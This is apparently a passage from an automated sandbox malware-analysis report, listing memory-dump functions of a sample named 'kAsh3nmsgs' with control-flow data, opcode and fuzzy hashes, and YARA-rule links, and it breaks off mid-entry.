                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1895 6929193-692919e 1896 69291a0-69291a5 1895->1896 1897 69291a6-69291c5 1895->1897 1896->1897 1898 69291c7-69291ca 1897->1898 1899 69291f0-69291f3 1898->1899 1900 69291cc-69291eb 1898->1900 1901 6929ab3-6929ab5 1899->1901 1902 69291f9-692920e 1899->1902 1900->1899 1904 6929ab7 1901->1904 1905 6929abc-6929abf 1901->1905 1909 6929210-6929216 1902->1909 1910 6929226-692923c 1902->1910 1904->1905 1905->1898 1907 6929ac5-6929acf 1905->1907 1911 692921a-692921c 1909->1911 1912 6929218 1909->1912 1914 6929247-6929249 1910->1914 1911->1910 1912->1910 1915 6929261-69292d2 1914->1915 1916 692924b-6929251 1914->1916 1927 69292d4-69292f7 1915->1927 1928 69292fe-692931a 1915->1928 1917 6929253 1916->1917 1918 6929255-6929257 1916->1918 1917->1915 1918->1915 1927->1928 1933 6929346-6929361 1928->1933 1934 692931c-692933f 1928->1934 1939 6929363-6929385 1933->1939 1940 692938c-69293a7 1933->1940 1934->1933 1939->1940 1945 69293d2-69293dc 1940->1945 1946 69293a9-69293cb 1940->1946 1947 69293de-69293e7 1945->1947 1948 69293ec-6929466 1945->1948 1946->1945 1947->1907 1954 69294b3-69294c8 1948->1954 1955 6929468-6929486 1948->1955 1954->1901 1959 69294a2-69294b1 1955->1959 1960 6929488-6929497 1955->1960 1959->1954 1959->1955 1960->1959
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: deb67073f4e474860a6b0fbedbb038751fbfd9b140d93f23fbca1b3f19240978
                                                                                                                • Instruction ID: cbd4fcae4a8d549ee1c469b742ada8f91ab8dba4d014250310ee32e18a249187
                                                                                                                • Opcode Fuzzy Hash: deb67073f4e474860a6b0fbedbb038751fbfd9b140d93f23fbca1b3f19240978
                                                                                                                • Instruction Fuzzy Hash: 0C517530B102169FDB54DB75D950BAEB7FAABC9244F108569D809DB38CEB30DC428B95
                                                                                                                Function 0117EB30 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149547363.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1170000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7abfba29e02f72b27c82dbf5740a83f91ee7b61d3e089dcba1bdff8781c52841
                                                                                                                • Instruction ID: a34b8176f64214ce44a00034811fbf5c20c73c9184e713b630239a8f1d405cc9
                                                                                                                • Opcode Fuzzy Hash: 7abfba29e02f72b27c82dbf5740a83f91ee7b61d3e089dcba1bdff8781c52841
                                                                                                                • Instruction Fuzzy Hash: 29414272D053899FCB18DFB9D8046EABFF1AF8A210F1981AAD504E7351DB349845CBA1
                                                                                                                Function 0117EC18 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0117EC7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149547363.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1170000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: bdf4f2aa1f326b67bfb6d5abcbdbb3c982903791b11135061843796fd66fa85b
                                                                                                                • Instruction ID: e95699d64c7ff9e7af49e70e7e52c172c97ad6945d2dc3ee36e748c203173d99
                                                                                                                • Opcode Fuzzy Hash: bdf4f2aa1f326b67bfb6d5abcbdbb3c982903791b11135061843796fd66fa85b
                                                                                                                • Instruction Fuzzy Hash: 02111FB1C002699BDB10DF9AC544BDEFBF4AB48320F14816AD818B7240D378A940CFA5
                                                                                                                Function 06924BE0 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: XPcq
                                                                                                                • API String ID: 0-714321711
                                                                                                                • Opcode ID: c16a7858e323f8b1a6e9814c437fc332bdf71f1d3483afb001a1d8d2edc1a823
                                                                                                                • Instruction ID: dec4327ecfe292d325505fdf22b5874cb7b80982b5d041d1f8212c07a64e0b29
                                                                                                                • Opcode Fuzzy Hash: c16a7858e323f8b1a6e9814c437fc332bdf71f1d3483afb001a1d8d2edc1a823
                                                                                                                • Instruction Fuzzy Hash: E5419D30A002099FDB559FB8C854BAEBBF6FF88700F20852AD155EB399DB708C018B91
                                                                                                                Function 0692DB15 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 2519fea56fc07a90895f02094aa20dcc120a02a4bbca824192beb4e090d8ef54
                                                                                                                • Instruction ID: cd4701a50285af2c93d1f77fbe419b324bbaf3cd9cd8bc9bb420b90b9de211a0
                                                                                                                • Opcode Fuzzy Hash: 2519fea56fc07a90895f02094aa20dcc120a02a4bbca824192beb4e090d8ef54
                                                                                                                • Instruction Fuzzy Hash: BC41E030E0071A9FDF65DF64C49469EBBB6FF85700F20492AE411EB648DB70D94ACB81
                                                                                                                Function 0692227D Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 127a6491980846ec33a82af6357cf67e0de554f355631118a4f7b4942eaa9969
                                                                                                                • Instruction ID: 7d3d3b7a3c94bce933048ada28d8e082192eb9d434eaaaa6274bd2198fe92a88
                                                                                                                • Opcode Fuzzy Hash: 127a6491980846ec33a82af6357cf67e0de554f355631118a4f7b4942eaa9969
                                                                                                                • Instruction Fuzzy Hash: 3C31C030B003168FDB59AB74C55426EBBE6BB89610F208479D406DB78CDF36DE46CB91
                                                                                                                Function 06922290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 43a7bc2ab8a144a8a8698230a5cb40f83781e88511aa9c9d9810d30695f6a8b6
                                                                                                                • Instruction ID: 5e90eebb1c72d5f60e358c27afb0f024c7ef134c8cee847cfba0b0f74975fe72
                                                                                                                • Opcode Fuzzy Hash: 43a7bc2ab8a144a8a8698230a5cb40f83781e88511aa9c9d9810d30695f6a8b6
                                                                                                                • Instruction Fuzzy Hash: BE31CF30B002168FDB59AB74C55466EBAE6BF89610F208439D406DB388DE36DE46CBA1
                                                                                                                Function 06922408 Relevance: 1.0, Instructions: 1000COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67dd1327dcc62b079691bd2c58a12d597ece49caba9d0e6ea5770a82be31e217
                                                                                                                • Instruction ID: 4113a1dcfa9e839d91f236958265400aa4cf7db60b51c611799e4c4abf238bc2
                                                                                                                • Opcode Fuzzy Hash: 67dd1327dcc62b079691bd2c58a12d597ece49caba9d0e6ea5770a82be31e217
                                                                                                                • Instruction Fuzzy Hash: F8928734A002158FDB64CB68C188B5DBBF6FB45314F64C4A9D449EBB69DB35ED81CB80
                                                                                                                Function 06926248 Relevance: .2, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6d03edf35578397a969bffb60d7f9831312ec6bdab92bf66ca16effce179f25
                                                                                                                • Instruction ID: d022ec5a44b8eb3120e230652baf7e8a80a8a103a7cd1d201263c4642d4bd3fe
                                                                                                                • Opcode Fuzzy Hash: b6d03edf35578397a969bffb60d7f9831312ec6bdab92bf66ca16effce179f25
                                                                                                                • Instruction Fuzzy Hash: 5A61D0B1F000224FCB549A7DC88466FEADBAFC4620B25443AD80EDB768DE65DD0287C2
                                                                                                                Function 06924640 Relevance: .2, Instructions: 224COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6908e8ef43ea9a9fc230bf6f10c79bc47636e7c7f7e9380184939f9064c77ed
                                                                                                                • Instruction ID: 0cbb89a40cce556dd4ae6365675e2187bbadb714f40ce3c6a35e8bd7e8a1db5a
                                                                                                                • Opcode Fuzzy Hash: a6908e8ef43ea9a9fc230bf6f10c79bc47636e7c7f7e9380184939f9064c77ed
                                                                                                                • Instruction Fuzzy Hash: 48916F30E1021A8FDF60DF68C880B9DB7B1FF89314F208595D549BB255EB70AA85CF91
                                                                                                                Function 06924321 Relevance: .2, Instructions: 223COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e0ee889b7711ecf91af873e398281dd064d516d81919f4a2abcd0edcc2d8480d
                                                                                                                • Instruction ID: 63cad659c83a049b70f50b9f98be1ee27ee5181a3608eeaabecdaad203da3475
                                                                                                                • Opcode Fuzzy Hash: e0ee889b7711ecf91af873e398281dd064d516d81919f4a2abcd0edcc2d8480d
                                                                                                                • Instruction Fuzzy Hash: 58815E34B0021A9FDB44DFA8D59475EB7F6AF89704F208539D40ADB788EB71EC428B91
                                                                                                                Function 06924658 Relevance: .2, Instructions: 210COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae909590f96d18d9bf05639b26da1dc2114a19ed97854c5ebf74a7022696ca36
                                                                                                                • Instruction ID: fa9deeb2716599b9421a273e14a6c5975bec57e67022459cb790850c6a88b148
                                                                                                                • Opcode Fuzzy Hash: ae909590f96d18d9bf05639b26da1dc2114a19ed97854c5ebf74a7022696ca36
                                                                                                                • Instruction Fuzzy Hash: 84915C30E1021A8BDF64DF68C880B9DB7B1FF89714F208599D549BB354EB70AA85CF91
                                                                                                                Function 0692EB68 Relevance: .2, Instructions: 202COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 83f98dade842136d07a9f6d1f2e967e681122150986f442c34aa635447578c5e
                                                                                                                • Instruction ID: 26fb9d2bea4790eeef23cdd7713f55473cca26c5f33a93b8539f8e898ba5c9e2
                                                                                                                • Opcode Fuzzy Hash: 83f98dade842136d07a9f6d1f2e967e681122150986f442c34aa635447578c5e
                                                                                                                • Instruction Fuzzy Hash: 4F711C30A0021A9FDB54EFA9D984A9DBBF6FF88314F248429D415DB758DB30ED46CB40
                                                                                                                Function 0692EB78 Relevance: .2, Instructions: 201COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ba3f5ac32465a6d789ac779d3fbf36c2317c1a9552ce8b7deb2fddef1000fc56
                                                                                                                • Instruction ID: 4e453bf0445182acc7773d20e37744e77cfac79191a040052bf04aa843484c90
                                                                                                                • Opcode Fuzzy Hash: ba3f5ac32465a6d789ac779d3fbf36c2317c1a9552ce8b7deb2fddef1000fc56
                                                                                                                • Instruction Fuzzy Hash: 7D711B30A0021A9FDB54EFA9D980A9DBBF6FF88314F24842AD415DB758DB30ED46CB50
                                                                                                                Function 0692FCD9 Relevance: .2, Instructions: 176COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b9b56f2dbe310e7fd2edd4721be2f5e3a3adaf1896c16080c58573ee35483252
                                                                                                                • Instruction ID: 5142b1d62296fda9a2cf4fc63d6f3cc76b3700a33e4494e5b45498c0b5fa50df
                                                                                                                • Opcode Fuzzy Hash: b9b56f2dbe310e7fd2edd4721be2f5e3a3adaf1896c16080c58573ee35483252
                                                                                                                • Instruction Fuzzy Hash: C851E331E40116DFDB64EB78E4546AEBBB6FF88315F20887AE00AD7658DB318D45CB81
                                                                                                                Function 0692FA88 Relevance: .2, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e40970808d798da0114571dcc65f7b166820efac05136f6909552e3de4a4c5c
                                                                                                                • Instruction ID: dee3cf5dca638809ad9704219d25787b7e74ebf66bea297496a0b5bd344d112d
                                                                                                                • Opcode Fuzzy Hash: 8e40970808d798da0114571dcc65f7b166820efac05136f6909552e3de4a4c5c
                                                                                                                • Instruction Fuzzy Hash: 9951D830B502159FEF649B6CD99473F26AEE789710F30482AD40AD779CCA39CD458792
                                                                                                                Function 0692FA98 Relevance: .2, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fef60cd8ab09ad75612feb19981b512ea6f95958b13bf1b27453b703115150b2
                                                                                                                • Instruction ID: a87c21400fb1ff655b4fc23e07b07c9697597debbc465c4504042bbd0f07ce64
                                                                                                                • Opcode Fuzzy Hash: fef60cd8ab09ad75612feb19981b512ea6f95958b13bf1b27453b703115150b2
                                                                                                                • Instruction Fuzzy Hash: C351D730B502259BEFA4AB6CD95473F266EE789710F30482AE40AD379CCA39CD854392
                                                                                                                Function 06925499 Relevance: .1, Instructions: 132COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df814ede696ad224622c5d3aeb95c540b5695d085a9b28d01b678b4d284d8dea
                                                                                                                • Instruction ID: b2c65d25ccd130e6e10f465a6346c1aab62a10bd4e1abf01b93356ff7710dc60
                                                                                                                • Opcode Fuzzy Hash: df814ede696ad224622c5d3aeb95c540b5695d085a9b28d01b678b4d284d8dea
                                                                                                                • Instruction Fuzzy Hash: 11413D71E0061A8FDF70CFA9D880AAEF7B6EB85310F21492AD156D7A58D330E8558B91
                                                                                                                Function 06925618 Relevance: .1, Instructions: 118COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6bd0edd1914d4abba943b3dde9e8c8c57e658c9f14b944d4f87d9b3d2cd455c
                                                                                                                • Instruction ID: cceda77a89a8a3df632b146f2242100f2a3f0c02f71d3c5e896a04fa0bca36ed
                                                                                                                • Opcode Fuzzy Hash: d6bd0edd1914d4abba943b3dde9e8c8c57e658c9f14b944d4f87d9b3d2cd455c
                                                                                                                • Instruction Fuzzy Hash: D541D074E001168BDF60CBA8C8C0A7EFBBAFB45310F35C926D45ACBA49C634D941DB91
                                                                                                                Function 06922140 Relevance: .1, Instructions: 98COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce3f192847ed355c0fded2b0d3d8ad4b4782de40d341cc2fca149dd5322dea7a
                                                                                                                • Instruction ID: f85975af641832182e35eef0d72ec4512e9837703c062c23ccd1d6cc6aca1cb7
                                                                                                                • Opcode Fuzzy Hash: ce3f192847ed355c0fded2b0d3d8ad4b4782de40d341cc2fca149dd5322dea7a
                                                                                                                • Instruction Fuzzy Hash: 3831D335E102169FCB48DF65C884A9EB7F6BF88310F248529E906E7744DB71ED42CB40
                                                                                                                Function 06922150 Relevance: .1, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df9bc3b6aae83ff1ac1ed58460bd7f19e015aa8a9b17accafdf3b9659c18a70d
                                                                                                                • Instruction ID: fe1ac026346858c5460be8fca40b513a8c4d967a71fde7c2ad90c082e417b997
                                                                                                                • Opcode Fuzzy Hash: df9bc3b6aae83ff1ac1ed58460bd7f19e015aa8a9b17accafdf3b9659c18a70d
                                                                                                                • Instruction Fuzzy Hash: FC31A234E102169BCB48DF65D894A9EB7F6BF89310F208529E90AE7744DB71AD42CB40
                                                                                                                Function 06923B21 Relevance: .1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a212be917a50b1e5b0871dbac8fd48b4e9f3a494516aa9de2ca0f24e6a2578ec
                                                                                                                • Instruction ID: 0d7c4debceb378ed9a9a4a81fdafa9e00df413908ae813b226cfe7a50ddb3584
                                                                                                                • Opcode Fuzzy Hash: a212be917a50b1e5b0871dbac8fd48b4e9f3a494516aa9de2ca0f24e6a2578ec
                                                                                                                • Instruction Fuzzy Hash: 5E219C75F00616AFDB50DFA9E881BAEBBF9BB48710F108025E905EB344E735DD418B91
                                                                                                                Function 06923B30 Relevance: .1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f2300e7b1119e35c84190fcc641e430fd0b91f01c6b60c23e2587bc5a369967b
                                                                                                                • Instruction ID: 1968955df015ab78dd357d63fde4f763f7c0784f0900504bb2dfdaf291b05b4d
                                                                                                                • Opcode Fuzzy Hash: f2300e7b1119e35c84190fcc641e430fd0b91f01c6b60c23e2587bc5a369967b
                                                                                                                • Instruction Fuzzy Hash: DF219A75E006269FDB50DFA9E880AAEBBF5FB48700F108025E905EB344E735DD018B90
                                                                                                                Function 0112D3BC Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da2bbc7509b78e1277c5374239b75c0b46b50c3d5e7434830119750fc8419547
                                                                                                                • Instruction ID: 77fb09a6d27a6c7b44677bf8d53b921dff2b9f099beffc504d98fd1e783cb808
                                                                                                                • Opcode Fuzzy Hash: da2bbc7509b78e1277c5374239b75c0b46b50c3d5e7434830119750fc8419547
                                                                                                                • Instruction Fuzzy Hash: D32146B1504280DFDF0DDF58E9C0B26BFA5FB84314F20C56DD8094B696C376E466CA62
                                                                                                                Function 0112D044 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4928808cb1fea5c51422b76cd9ea3916cff045117282f7a93279cec38ca03a09
                                                                                                                • Instruction ID: a37de4dd4b11f08b6c4aa64833c4829cbadeab6ca6d3a5626dfe7d3e43800b9e
                                                                                                                • Opcode Fuzzy Hash: 4928808cb1fea5c51422b76cd9ea3916cff045117282f7a93279cec38ca03a09
                                                                                                                • Instruction Fuzzy Hash: C4214671504204DFDF19DF68E9C4B26BBA5FB84314F20C5ADE8494B362C73AD866CB62
                                                                                                                Function 0112D20C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 14dd91b972a1f8e98b393ebb1f65d26e5ee4e95e69d907b855d0bf6485773fdd
                                                                                                                • Instruction ID: 5aa843406084eb98adf4a532966710eb1aa9d0b31d42bdf67d9d28323a0e0363
                                                                                                                • Opcode Fuzzy Hash: 14dd91b972a1f8e98b393ebb1f65d26e5ee4e95e69d907b855d0bf6485773fdd
                                                                                                                • Instruction Fuzzy Hash: 25216871504244DFDF09DF58E5C4B2ABB65FB85334F20C669E8094B242C376D426CA62
                                                                                                                Function 06926D70 Relevance: .1, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2db19808985e97cbc3275106b0529ddf7d71849fa1af15e841c630faadecf86c
                                                                                                                • Instruction ID: 28910624a19fd1903fefbb3fc1b719ba210fb5bbecfebed8b07e5eb22bdb4e00
                                                                                                                • Opcode Fuzzy Hash: 2db19808985e97cbc3275106b0529ddf7d71849fa1af15e841c630faadecf86c
                                                                                                                • Instruction Fuzzy Hash: 0E21A230B1012A9BDF44EB69E8547AEB7B6EB84310F248435D405EB748DB31ED528BC5
                                                                                                                Function 06923C40 Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 717d4e75a609a6ccee26d3def001e24466ff6932efecea1898ba3832a03aa033
